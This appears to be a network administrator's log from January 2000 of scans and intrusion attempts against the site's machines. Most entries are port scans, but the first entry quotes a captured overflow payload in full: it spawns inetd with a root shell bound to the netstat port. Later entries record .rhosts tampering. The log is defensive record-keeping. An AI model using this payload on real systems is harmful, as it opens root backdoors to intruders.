Short summary of attacks against us for Jan 2000 year - time GMT(-5) source_ip[:port] (dns name, if any) attack/scan/notes 2000/01/09-02:21:35.27 24.132.52.119(node13477.a2000.nl) attack machines with buff overflow ../bin/sh.-c.echo 'netstat stream tcp nowait root /bin/sh sh -i' > /tmp/ .nfo; /usr/sbin/inetd -s /tmp/.nfo; rm -f /tmp/.nfo;..............ADM_FENCE..... ......................netmgt_endofargs /bin/sh.-c.echo netstat stream tcp nowait root /bin/sh sh -i > /tmp/.heh ; /usr/sbin/inetd -s /tmp/.heh; rm/tmp/.heh;...............ADM_FENCE............ ...............netmgt_endofargs 2000/01/07-15:36:19.44 200.196.82.49 (b19049.dial-rjo.impsat.com.br) scan net for port 53 2000/01/07-16:13:23.92 199.2.117.66(shell.pacifier.com) scan net for various ports 2000/01/07-17:20:15.23 202.212.5.30(goo212.goo.ne.jp) scan net for port 53 - slowly, 1 connect per 1-4 hrs. 2000/01/07-17:48:37.0 216.165.166.163(dns.madison.com) ??? 2000/01/07-18:29:44.64 158.152.1.58(cache-1.ns.demon.net) repeatedly probe ace and boss for namserver 2000/01/07-19:29:49.43 161.184.178.200(edtntnt8-port-454.agt.net) port scan 2000/01/08-01:05:57.03 24.239.21.177 (n06h1177.ex-pressnet.com) port 137 scan 2000/01/08-02:45:52.66 216.17.131.71 (asp071.asptech.com) scan couple of machines for port 111 2000/01/08-03:06:46.34 24.95.57.139 (dhcp9557139.columbus.rr.com) net scan port 111 2000/01/08-03:45:27.06 204.167.182.75 (hngvip.com) port 137 scan 2000/01/08-06:58:39.61 209.67.241.201 port 137 scan 2000/01/08-07:03:27.52 216.17.34.140 (linux1.goztech.com) scan for rpc pgm 100232, then connect to prot 750? 2000/01/08-07:12:55.65 128.11.41.246 (bankone7.cam-colo.bbnplanet.com)port scan 2000/01/08-12:49:49.45 204.122.22.169 (iceman.ndip.eskimo.net) port 137 scan 2000/01/08-13:11:36.6 216.165.166.163(dns.madison.com) ??? 2000/01/08-14:40:01.11 209.98.163.187 probe net for port 111 2000/01/08-17:29:20.56 24.114.22.187 (cr284960-a.etob1.on.wave.home.com) scan net for port 21 2000/01/08-17:56:24.63 62.136.67.74 (modem-74.finasteride.dialup.pol.co.uk)port scan 2000/01/08-18:36:37.16 62.52.251.81(dsdf-m251-81.pool.mediaways.net) port scan 2000/01/08-21:57:08.35 216.98.68.125 (PM2-29.NETVA.COM) scan 132.235.1.80 for port 8080? 2000/01/08-21:57:21.76 216.98.68.125 (PM2-29.NETVA.COM) scan 132.235.1.80 for port 3128? 2000/01/08-22:31:20.78 4.16.11.103 (PPPb44-ResaleFortWorth2-2R1005.saturn.bbn.com) scan ace port 137 2000/01/08-23:22:49.19 212.81.241.38 (ppp28966.01019freenet.de) port 137 scan 2000/01/09-00:29:42.75 210.219.78.129 (ns.netping.co.kr) portmapper scan 2000/01/09-00:51:17.88 207.167.64.158 (sdts3-158.znet.net) por 137 scann 2000/01/09-02:27:15.67 208.16.68.100 (famvid.com)netstat scan 2000/01/09-03:30:04.11 216.32.120.55 (racerunner.ebay.com) port 137 scan 2000/01/09-03:40:11.44 208.230.48.17 (muzi.net) scan port 40958thru ports 41079. 2000/01/09-05:10:47.44 202.96.191.124 (gnet124.szptt.net.cn) port 137 scan 2000/01/09-12:12:54.45 194.162.100.205 (enn.globe.de)portmapper scan 2000/01/09-12:21:51.69 195.171.253.91 (host5-171-253-91.btinternet.com) scan net for 2140 2000/01/09-13:36:54.80 210.84.8.3 (slsdn33p03.ozemail.com.au) port 137 scan 2000/01/09-15:29:35.95 151.200.125.73 (client-151-200-125-73.bellatlantic.net) port scan 2000/01/09-18:09:11.64 202.212.5.30 (goo212.goo.ne.jp) port 2001? and other ports on net. 2000/01/09-19:08:55.61 208.184.172.182 (208.184.172.182.aureate.com) ?? 2000/01/09-19:32:46.14 207.153.66.206 (plague.mudgate.com) portmapper scan 2000/01/09-20:33:23.77 216.32.68.11 scan port 33434j 2000/01/09-22:43:31.69 147.231.100.202 (pink.ujf.cas.cz) scan ace for port 111 2000/01/10-00:30:38.24 129.116.81.62 (amazo.engr.utexas.edu) scan net for port 53 2000/01/10-01:45:48.70 24.216.16.167 (24-216-16-167.hsacorp.net) port 137 scan 2000/01/10-09:26:41.42 216.32.68.11 scan port 33434 2000/01/10-09:30:21.74 209.67.78.200 ace and boss for port 33434 2000/01/10-09:55:41.52 206.15.143.238 (quincy-ip-2-238.dynamic.ziplink.net) port 137 scan 2000/01/10-09:57:14.94 207.172.216.104 (207-172-216-104.s104.tnt1.sbo.ma.dialup.rcn.com) por 137 scann 2000/01/10-10:16:10.50 212.250.37.52 (p-307-virgin7.tch.virgin.net) port 137 scan 2000/01/10-12:07:37.17 213.4.35.252 port 137 scan 2000/01/10-12:38:56.10 209.112.37.9 (canada1.rs1885.com) prot 137 scan 2000/01/10-15:50:56.66 207.54.32.138 (ig-88.symix.com) probe of port 137 2000/01/10-16:46:45.52 206.141.200.36(dyn1-tnt1-36.dayton.oh.ameritech.net) probe port 137 on seorf 2000/01/10-19:35:19.94 192.100.181.240 scan of net for port 111 2000/01/11-00:23:08.20 216.25.117.208 probe port 132 2000/01/11-01:05:20.15 (chi-qbu-nvn-vty47.as.wcom.net) 216.192.169.47 probe port 137 2000/01/11-01:41:44.65 210.230.197.132 scan machines for port 111 2000/01/11-12:56:29.44 204.221.88.145 (usr-virginia-145.uslink.net) scan port 137 on seorf 2000/01/11-17:17:49.41 208.226.48.196 scan port 137 on seorf 2000/01/11-20:14:55.81 200.44.56.163 scan port 137 on ace and boss 2000/01/11-20:29:42.14 207.220.178.211 (col-oh35-83.ix.netcom.com) scan port 137 on ace 2000/01/11-21:03:37.85 168.126.199.80 scan port 111 on ace 2000/01/11-21:19:51.95 150.159.224.8 (gate1.lci.net) scan ports 22480-22496 . 2000/01/11-21:37:02.63 207.245.20.130 (PORT-2118.info-internet.net) scan port 137 on ace 2000/01/11-22:27:07.96 63.17.37.200 (1Cust200.tnt17.det3.da.uu.net) probe port 137 2000/01/11-22:49:52.81 168.126.199.80 scan port 111 on ace 2000/01/11-23:20:35.54 168.126.199.80 scan port 111 on ace 2000/01/12-22:37:25.64 210.230.197.132:2666 scan net for port 111 2000/01/12-01:30:43.21 205.252.11.45 (205.252.11.45) scan port 137 on seorf 2000/01/12-02:56:24.55 202.96.191.124 (202.96.191.124) scan port 137 on ace 2000/01/12-03:33:05.79 210.181.57.57 dump portmapper on ace 2000/01/12-05:13:33.02 168.73.181.40 scan port 137 on ace 2000/01/12-05:51:51.35 206.77.34.4:53 (pirate.crawford.isd.tenet.edu) scan net for port 111 2000/01/12-08:33:52.07 210.181.57.57 dump portmapper on ace 2000/01/12-10:26:09.96 212.211.70.37 scan port 137 on ace 2000/01/13-10:29:27.80 137.48.1.30:2666 (qmaster.unomaha.edu) scan net for port 111 2000/01/13-17:00:16.56 212.184.160.33() scan net for port 111 2000/01/14-12:40:46.33 161.58.250.237 (what3vah.org) random connections to 132.235.2.66 every couple hrs. 2000/01/14-20:54:17.25 63.70.24.90:2666 () scan net for port 111 2000/01/14-22:43:25.46 208.31.69.4 () probe port 137 on pc 2000/01/14-23:24:10.74 63.71.58.85:2666 () scan net for port 111 2000/01/15-11:11:19.56 130.243.68.120 (cal1.idt.mdh.se) probe ports 110, 109 and 143 on ace 2000/01/15-21:31:59.22 35.8.242.52 (study-abroad.isp.msu.edu) probe portmapper on ace 2000/01/15-18:44:33.54 198.62.174.1:2666 (alpha.dtix.com) scan host 132.235.1.188 for port 111 2000/01/15-22:28:59.26 209.207.141.157:2666 () probe network for port 111 2000/01/16-12:38:56.55 194.78.84.26 () portmapper probe on ace 2000/01/16-21:13:27.81 130.243.68.120 (cal1.idt.mdh.se) probe ports 110, 109 and 143 on ace 2000/01/17-02:12:12.51 24.28.198.159 (fx4-1-159.mgfairfax.rr.com) scan net for port 111 2000/01/17-02:24:23.47 204.210.231.120 (dhcp231120.columbus.rr.com) scan net for port 139 2000/01/17-04:05:56.92 209.38.201.106 () probe ace ports 111, 1026, 876 2000/01/17-09:44:10.11 210.96.145.188 () scan net for port 12345 2000/01/18-09:28:26.64 207.139.255.15 (dialin15.quebec.globalserve.net) scan net for port 111 2000/01/17-09:55:46.22 203.36.3.133 (dialup1-ppp133.wire.net.au) probe port 137 on ace.and seorf every cople hrs. 2000/01/18-22:47:10.26 144.171.222.113:137 (b2221.nas.edu) scan port 137 on net 2000/01/18-17:14:05.12 205.188.3.147:5190 () try to connect to 132.235.18.42:1031 every hour or so. 2000/01/20-01:20:35.59 216.209.29.31 (HSE-Toronto-ppp88018.sympatico.ca) net probe individual addrs. for port 12345 2000/01/20-21:53:15.31 209.183.154.86 broadcast 255.255.255.255 probe of net for port 161, and port 80,21,25,161 on selected machines 2000/01/20-22:56:10.16 212.242.97.29 (cvx-mal-1-29.ppp.netlink.se) broadcast 255.255.255.255 probe of net for port 2140 2000/01/20-03:24:14.63 128.171.4.163(volcano2.pgd.hawaii.edu) portmon probe on ace 2000/01/21-05:53:07.28 203.234.129.221() portmon probe on ace 2000/01/21-10:03:55.19 207.69.200.132(irc.mindspring.com) broadcast 255.255.255.255 probe of net for port 1540 2000/01/21-10:30:44.45 207.69.200.132(irc.mindspring.com) broadcast 255.255.255.255 probe of net for port 1702 And now, go with dates of EST/EDT. list interesting stuff instead of all. 2000/01/28-20:45:58.38 212.205.254.233(athe530-q233.otenet.gr) scan for port 1243 on net 2000/01/29-08:26:49.93 130.184.165.229 (tesla.eleg.uark.edu) ttdbserverd buffer overflow attack to start copy of inetd (/tmp/bob attack) 2000/01/29-14:32:22.63 202.187.143.10 (Malaysia) ttdbserverd buffer overflow attack to add "+ +" to /.rhosts.a 2000/01/29-15:59:02.92 209.240.21.24 scan for port 21 on net 2000/01/30-13:38:54.96 130.184.165.229 (tesla.eleg.uark.edu) ttdbserverd buffer overflow attack to start copy of inetd (/tmp/bob attack) 2000/01/31-15:37:56.11 12.78.130.92 scan net for port 12345